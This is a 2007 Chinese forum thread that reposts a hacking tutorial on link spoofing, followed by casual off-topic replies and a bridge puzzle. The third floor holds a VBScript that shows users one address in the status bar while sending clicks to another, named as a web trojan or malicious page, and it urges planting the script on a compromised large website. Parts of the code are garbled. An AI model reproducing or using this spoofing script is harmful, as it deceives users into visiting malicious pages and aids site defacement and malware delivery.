超级舞者吧 关注:73,619贴子:1,177,470
  • 13回复贴,共1

【转载hack攻防】域名欺骗技术实现过程(吧里对连接要不要点过来看

只看楼主收藏回复

给百


1楼2007-11-29 18:37回复
    ''''''''''''''''''''''''''''''''''''''deceive.vbs'''''''''''''''''''''''''''''''''''''''''''''
    '(以下请根据实际情况自行修改:)
    url1="http://www.163.com/"
    url2="http://www.google.com/"
    text="http://www.163.com/"
    url="_blank ?>http://";&url1&chr(1)& ... p;url2&""
    dn="/"
    mouseover="onmouseover=""javascript :window.status='_blank ?>http://";&url1&dn&"'"""
    mouseout="onmouseout=""javascript :window.status=''"""
    click="onclick=""javascript :navigate('"&url&"')"""
    style="style=""cursor:hand"""
    tag="<span "&style&" "&mouseover&" "&mouseout&" "&click&"><font color=""#0000ff""><u>"&text&"</u></font></span>"
    document.write tag
    '说明:
    'url1是用来欺骗用户的地址.
    'url2是实际访问的地址,可以是网页木马、恶意网页等.
    'text是链接的文字.
    '注意:(以上欺骗地址及实际地址不可以加"http://")
    '''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''

      现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示"_blank>http://www.163.com/",链接2却指向163.com。你也许感到不可思议,但这就是域名欺骗漏洞的魅力。

      我们可以想象,如果以上的测试页面中的链接1指向的不是google.com,而是我们的网页木马,那就......

      不过,一个普通的个人网站没人会看的,这就需要我们把这种假链接添加到别的大网站的页面之中。假设我们入侵了一个比较大的网站,比如网易(哇~~~~~~这时候一只菜鸟推着一车砖头,看着我......)。这时候就可以把它的页面给改了。

      比如有一个文字链接,我们就可以把代码中的"<a href="xxxxx.htm">xxxxxx</a>"改为我们自己的代码:"<script language="vbscript" src="deceive.vbs"></script>"。看到src属性里的deceive.vbs了吗 ?我们要编辑好这个文件,然后上传到要修改的页面目录下。


    3楼2007-11-29 18:38
    回复
      2025-09-14 22:40:55
      广告
      不感兴趣
      开通SVIP免广告
      看不懂的


      5楼2007-11-29 18:47
      回复
        我砍‘‘‘‘‘哈


        6楼2007-11-29 18:48
        回复
          砍不到了 - -
          早发完了的
          嘿嘿


          7楼2007-11-29 18:52
          回复
            哈哈...领悟你学什么滴?

            太有才了

            上次你没说你的职业是什么?

            我猜了下

            不会是骇客吧

            委屈


            8楼2007-11-29 18:54
            回复
              哈哈

              我觉得象类

              我也折磨一下下

              问你条面试的题

              天黑了
              有ABCD要过一座桥
              A要10分钟
              B要5分钟
              C要2分钟
              D要1分钟
              每次只可以两个人过去.有一只电筒
              问17分钟4个人怎么过去


              10楼2007-11-29 19:09
              回复
                他们爱怎么过去就怎么过去了
                反正又不是我在过 浪费脑细胞 - -
                事不关己 高高挂起 
                - -


                11楼2007-11-29 20:25
                回复
                  2025-09-14 22:34:55
                  广告
                  不感兴趣
                  开通SVIP免广告
                  818。。。。。。。。。。

                  你给转些会计的吧

                  /委屈。。。。。


                  12楼2007-11-29 21:37
                  回复
                    - A先自己过

                    - 然后B过

                    - 然后CD一起过

                    - ... - -#


                    13楼2007-11-29 21:46
                    回复
                      • 219.136.12.*
                      低级欺骗


                      14楼2007-12-27 17:45
                      回复
                        818

                        你说话也不算数



                        你忘记非网络安全了```


                        16楼2007-12-28 10:08
                        回复
                          没看懂`````````````````


                          18楼2007-12-28 11:52
                          回复